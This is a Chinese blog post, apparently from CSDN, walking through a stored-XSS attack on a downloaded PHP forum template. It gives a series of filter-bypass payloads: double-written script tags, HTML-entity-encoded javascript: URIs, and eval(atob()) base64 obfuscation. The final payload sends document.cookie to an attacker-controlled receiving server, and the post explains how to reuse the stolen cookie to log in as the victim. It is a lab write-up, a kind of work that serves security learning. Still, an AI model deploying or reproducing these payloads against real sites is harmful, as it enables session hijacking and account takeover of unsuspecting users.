记一次XSS绕过的思路

最新推荐文章于 2023-04-16 13:09:02 发布
最新推荐文章于 2023-04-16 13:09:02 发布
阅读量1.7k 收藏 5
点赞数 3
分类专栏: web安全 文章标签: xss xss绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiaopan233/article/details/90146043
版权

目录

介绍

绕过的第一个思路(慎点,失败了。。。)

绕过的第二个思路(成功的)

网上下载了一个论坛的模板源码。是用PHP写的。闲来无事便对其测试了一番。论坛上最忌讳的漏洞之一就是存储型XSS了。本文记录一下测试的过程和思路。也许能对XSS的攻击思路有些启发把

本次实验还有视频哦:https://www.bilibili.com/video/av52266043

论坛模板源码:

链接:https://pan.baidu.com/s/1j15FJqX1FGcdX-m2CbZqMg 
提取码:3j3v 

XSS嘛。。。弹窗肯定事不够的了。那肯定要拿cookie才叫一个完整的XSS过程嘛=。=

首先先写好接收cookie服务器的php代码。很简单。如下:

接着我们来看看这个论坛系统吧

 

主页面没有什么东西。我们点进里面的帖子去看看。

可以发表评论。我们提交一下查看它请求的接口是什么。

发现是发送到了run.php中。我们看看源码。

发现它对输入的参数run进行了引用。也就是说run这个参数发的值是什么就加载对应的php文件。这里run的值为write_replay。我们找到这个文件。这里猜测就是处理回复的地方了。我们可以直接搜索Form表单提交的参数。搜索content。

这些代码都是一些常规的判断代码。唯一引起我注意的就是这个filter2函数。filter就是过滤的意思。那么自然这个函数就是过滤用的。我们这个测试是测试其能否被存储型XSS攻击。所以过滤的内容很值得我们关注。

进入这个函数。看到它过滤了一大堆东西。如下:

可以看到。我们常规注入的字符。诸如script、iframe、onerror等都被过滤了。但是仔细一看。

绕过的第一个思路(慎点,失败了。。。)

这条正则大概意思就是。(我就拿script来说)如果输入中有<script>。那么就把<script>替换成空。

但是这个正则是只匹配<script>。所以我们可以通过双写<script>来绕过。

绕过原理:

当我输入 <scr<script>ipt>时。php将红色字的<script>替换为空。那么这里黑色字的<scr和ipt>合起来就是一个新的<script>。这样便可绕过了。

我们来测试一下。

Payload:

<scr<script>ipt>alert(1)</scr</script>ipt>

 

成功弹窗。

构建拿cookie的Payload思路:

拿cookie很简单。doucment.cookie即可。但是要怎么发送呢。

方法:直接GET请求。通过img的src来请求。

通过GET请求的话。那就是要找一个img。然后修改其src就好了。很自然的想到这样一个payload原型:

<img src=”1” id=”img”><script>document.getElementById(“img”).src=http://xxx.php?cookie= + document.cookie</script>

但是我们查看下源码发现。它过滤了id=以及后面的字符串。

写个实例更直观一些。

 

所以我们自己直接创建一个img是不可行的了。不过这样就算行不通了吗?no,还没完呢。

既然直接写入一个img是不可以的。那么这里我又想到了两个绕过思路。

  1. 不写入img。直接用它网站自带的img。
  2. 直接写img的id不行。那我们用js代码生成一个img。这样子我们就可以直接控制它的src了。

我们还是先来看第一个方法把。

我们在测试。可以在开发者工具中的console里面写js代码。这样子能很方便的测试我们的代码。

找图片:

看到这个网页中有两张图片。我们随便用一张即可。

原始payload:

<script>document.getElementsByTagName("img")[0].src="http://192.168.27.128/testXSS/get.php?v="+document.cookie</script>

使用的payload为:

 

<scr<script>ipt>document.getElementsByTagName("img")[0].src="http://192.168.27.128/testXSS/get.php?v="+document.cookie</scr</script>ipt>

但是程序并没有如愿执行。我们看到经过处理后输出的内容为

看到引号和中括号都被html实体编码了。这样子看来。。。好像又行不通了。。。

反正我现在没有想到要怎么过这个html实体编码。。。在<script>标签里面是不能使用html实体编码的。除非是在html里面,在html里面就不受html实体编码的限制。且html里面可以用javascript: 伪协议来执行js代码。这个javascript:伪协议是绕过的第二个方法。请看下面吧。

 

绕过的第二个思路(成功的)

我们看到代码中过滤了全部的主动的触发器。像onerror、onload等。它不只是单纯的去除掉这些字符串。而是连同引号中的字符串一起删掉了。我们可以测试一下。

 

所以我们用不了直接触发的触发器了。不过html中有一个东西,叫做javascript伪协议。这个东西可以写在标签里面。执行js代码。可以用在a标签的href中。

利用javascript伪协议。我们可以构建这样的一个payload:

原始payload:

<a href='javascript:alert(1) '>click me</a>

但是这个php过滤了javascript:。

不过幸运的是。我们可以通过html实体编码来绕过这个检测。因为是显示在html中的。所以html实体编码能够被正常解析。

编码后payload:

<a href='&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:alert(1)'>click me</a>

成功弹窗。

这时候我们要想拿cookie的话。就要构建一个get请求。一般不用ajax。。写的东西太多了。可以使用图片的src来进行get请求。

原始paylaod:

<img src="1" id="img"><a href='&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:document.getElementById("img").src="http://192.168.27.128/testXSS/get.php?v="+document.cookie'>click me</a>

 

但是这个网站php过滤了id=。所以就不能通过输入img的方式来创建一个图片了。

但是。发送请求的方式就是修改图片的src为接收端的url。那么,我们可以用这个网站自带的图片啊。

修改版payload:

<a href='&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:document.getElementsByTagName("img")[0].src="http://192.168.27.128/testXSS/get.php?v="+document.cookie'>click me</a>

实际使用一下。发现:

我们的document不见了。而且都跑到了javascript:的引号外面。

php过滤了这些字符串。。。

那么绕过的方式就只能是进行编码了。看了下代码。并没有过滤eval()、atob()。所以我们下一个版本的payload的思路就是先base64编码。然后再eval(base64解码)

payload:

先使用btoa转换成base64编码

<a href='&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:eval(atob("ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImltZyIpWzBdLnNyYz0iaHR0cDovLzE5Mi4xNjguMjcuMTI4L3Rlc3RYU1MvZ2V0LnBocD92PSIgKyBkb2N1bWVudC5jb29raWU"))'>click me</a>

 

成功包含在了javascript里面。

但是。。。点击的时候没有反应。。出了一个报错。。

我们再仔细看看上面输出的我们的Payload。发现atob的括号里面我们之前写的双引号被吃掉了。。。

知道原因就好办了。把双引号转成html实体编码即可绕过。

payload:

<a href='&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:eval(atob(&#x22;ZG9jdW1lbnQuZ2V0RWxlbWVudHNCeVRhZ05hbWUoImltZyIpWzBdLnNyYz0iaHR0cDovLzE5Mi4xNjguMjcuMTI4L3Rlc3RYU1MvZ2V0LnBocD92PSIgKyBkb2N1bWVudC5jb29raWU&#x22;))'>click me</a>

 

点击我们创建的click me。跳转到了一个新标签页。。

我们接收cookie的服务端也没有接收到。。。

我的猜测是a标签跳转的时候。新开了一个标签页。就没有了之前的那些图片了。自然无法通过修改src达到请求的目的。

那么既然a标签会跳转。那么我们在输入的时候用js代码创建一个图片不就可以了吗?

原始payload:

<a href='javascript:var img = document.createElement("img");img.src="http://192.168.27.128/testXSS/get.php?v=" + document.cookie;document.getElementsByTagName("body")[0].appendChild(img)'>click me</a>

 

payload:

<a href='&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;:eval(atob(&#x22;dmFyIGltZyA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImltZyIpO2ltZy5zcmM9Imh0dHA6Ly8xOTIuMTY4LjI3LjEyOC90ZXN0WFNTL2dldC5waHA/dj0iICsgZG9jdW1lbnQuY29va2llO2RvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCJib2R5IilbMF0uYXBwZW5kQ2hpbGQoaW1nKQ==&#x22;))'>click me</a>

 

点击clike me。成功获取cookie。

 

有了cookie之后再用firefox浏览器增加一个cookie。即可通过受害者的凭证登陆啦。

xiaopan233
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 10
    评论
专栏目录
XSS绕过
N1nG
09-22 5112
绕过XSS-Filter =======================利用 用户可以随心所欲地引入插入恶意脚本代码. =========================利用HTML标签属性值执行XSS========================= 很多HTML标中的属性都支持javascript:[code]伪协议的形式. //并非所有浏览器都支持,支持的例IE6 可以
一次xss绕过
nini_boom的博客
09-05 197
积累从点滴做起 在上传文件的地方,所有的文件必须要有以下抬头,那么这就说明直接上传小马是不现实的了。 我fuzz了一下,在地址处填入,发现大小写、编码、双写那我就不适用<--<img src=` onerror=alert(658)> --!> <img src=` onerror=alert(658)> --!> 这里的`被单独转出来了,出发o...
一次有意思的XSS过滤绕过
weixin_30307267的博客
12-07 146
  我的朋友赵一天今晚给我发了一个站,跟我说他xss绕不过去,让我试试。我正好无事,就帮她看看咯。     通过赵一天发我的站点,说实话,我自己学到了很多东西,感谢大佬的教诲。今天分享出来:     站点:xxx.com/sou        当我尝试:   xxx.com/souaaaa      我们查看源码或者f12 Ctrl+f搜索aaaa: 颇为震惊,搜索结果...
一次xss的黑盒挖掘和利用过程
weixin_30730151的博客
01-23 202
挖掘过程一: 自从上一次投稿,已经好久好久没写文章了。今天就着吃饭的时间,写篇文章,录下自己学习xss这么久的心得。在我看来。Xss就是javascript注入,你可以在js语法规定的范畴内做任何事情,js可谓强大,本次结合一次挖掘xss的过程和xss的综合利用来探讨,小菜一枚,希望大牛不吝赐教。文章里的网站打码,大家见谅 我们先看看网站 测试储存型xss的话,黑盒测...
高级实战案例:Python反反爬之JavaScript混淆
chinaherolts2008的博客
08-21 331
写在前面 很早之前在吾爱破解论坛上看见了【猿人学】Web端爬虫攻防大赛,当时进入他们官网的时候,比赛已经结束了。看着那些题目还挺有意思的,但由于各种原因一直没有机会去做那些题目。最近比较闲,就去把猿人学官网打开看了一下,尝试着完成了第一道题目---JS混淆[源码乱码] """ 当然在学习Python的道路上肯定会困难,没有好的学习资料,怎么去学习呢? 学习Python中有不明白推荐加入交流群号:928946953 群里有志同道合的小伙伴,互帮互助, 群里有不错的视频学习教程和PDF! 还有大牛
录几种XSS绕过方式1
08-03
本文主要录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
XSS绕过技术
10-11
Cross-Site Scripting(XSS绕过技术,来自论坛:法克论坛,作者:bystand
XSSBypass:XSS绕过技术
05-17
XSS绕过技术是安全研究人员和黑客为了测试或利用这些漏洞而发展出的一系列策略。 1. **理解XSS类型** - 存储型XSS:攻击者的脚本被存储在服务器上,然后在多个用户访问同一页面时触发。 - 反射型XSS:脚本通过URL...
第04篇:XSS三重URL编码绕过实例1
08-03
本文主要探讨了一个XSS三重URL编码绕过的实例,揭示了在某些情况下,简单的防御措施可能不足以阻止攻击。 首先,我们要理解XSS的基本概念。XSS攻击通常发生在Web应用程序未能正确过滤或转义用户输入的情况下。当...
第十二节 XSS 过滤器绕过-01
09-15
XSS 过滤器绕过技术详解 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的 Web 应用程序安全漏洞,攻击者可以通过插入恶意脚本来盗取用户信息、破坏网站操作等。为防止 XSS 攻击,开发者通常会使用 XSS 过滤...
EVAL混淆
一个孤独漫步者的遐想的博客
11-13 763
EVAL混淆 eval:可以执行js代码,有返回值 对js进行base64编码 eval中执行base64编码后代码 //eval("function cc(){return '52Hz'} cc()") eval(atob("ZnVuY3Rpb24gY2MoKXtyZXR1cm4gJzUySHonfSBjYygp")) 可设置多重转码加密,先转码52Hz得到NTJIeg==,在进行二次转码 多重转码混淆 //eval("function cc(){return '52Hz'} cc()")
eval一句话木马原理详解
blackbean的专栏
08-19 1815
http://wenku.baidu.com/view/38795d1910a6f524ccbf8591.html
《封号码罗》关于js逆向猿人学第一题m值的获取[纯补环境](二十四)
Python_DJ的博客
11-13 2416
js逆向猿人学第一题,m值的获取,纯补环境
漏洞篇(XSS跨站脚本攻击二)
m0_58001548的博客
04-16 650
页面中存在一个 p3 参数,type 类型为 hidden,闭合方式为双引号,所以 p3 为隐藏参数。我们使用 burpsuite 进行截断数据包进行分析。p3 的值为 hackme 我们直接插入代码这里必须使用">闭合,这样 XSS 代码才会被执行。
【文件包含漏洞03】文件包含漏洞的空字符绕过及六种利用方式
Fighting_hawk的博客
03-11 5107
1. 关于图片马的几种执行方式总结: (1)利用中间件解析漏洞,不同中间件不同版本的利用方式往往不同。 (2)利用.htaccess修改Apache局部配置。 (3) 利用文件包含执行漏洞。 2. 了解PHP魔术引号的作用。 3. 掌握文件包含漏洞空字符绕过的方法。 4. 掌握文件包含漏洞的六种利用方式。...
XSS攻击 eval(location.hash.substr(1)); 笔
滕青山博客
02-16 2818
前言 参考文档:web前端黑客技术揭秘笔 第三章 假设已经配置好hosts文件: 127.0.0.1 www.foo.com 127.0.0.1 www.evil.com 配置 根目录新建xssme.html文件,内容为: <script> eval(location.hash.substr(1)); </script> 以及alert.js文件,内容为: alert("123"); alert 浏览器访问http://127.0.0.1/xssme
猿人学第1题-------js混淆源码乱码
weixin_44048917的博客
03-28 501
js混淆源码乱码
XSS注入原理以及一些绕过姿势
热门推荐
qq_37019068的博客
10-09 1万+
介绍 XSS——跨站脚本攻击。通过这个攻击手段,攻击者可以将恶意的 JavaScript 代码插入存在 XSS 漏洞的 Web 页面中,当用户浏览带有恶意代码的页面时,这些恶意代码会被触发,从而达到攻击的目的。可以说,XSS 是针对用户层面的攻击。 XSS的分类 通常,我们吧XSS分为三个类型,即 存储型,反射型与DOM型。不同的类型原理各有差异,而且注入的点也不同。 存储型 存储型的XSS,最大的特点是可持久化,因为在过滤条件差的情况下,存储型的XSS的恶意代码会直接被保存在服务器端的数据库中。而这个恶意
XSS绕过方式有哪些
最新发布
10-27
XSS(跨站脚本攻击)是一种常见的Web攻击方式,攻击者通过注入恶意脚本来窃取用户信息或者执行其他恶意操作。以下是一些XSS绕过方式: 1. HTML编码绕过:攻击者可以使用HTML编码来绕过过滤器,例如使用<代替<,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 10
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值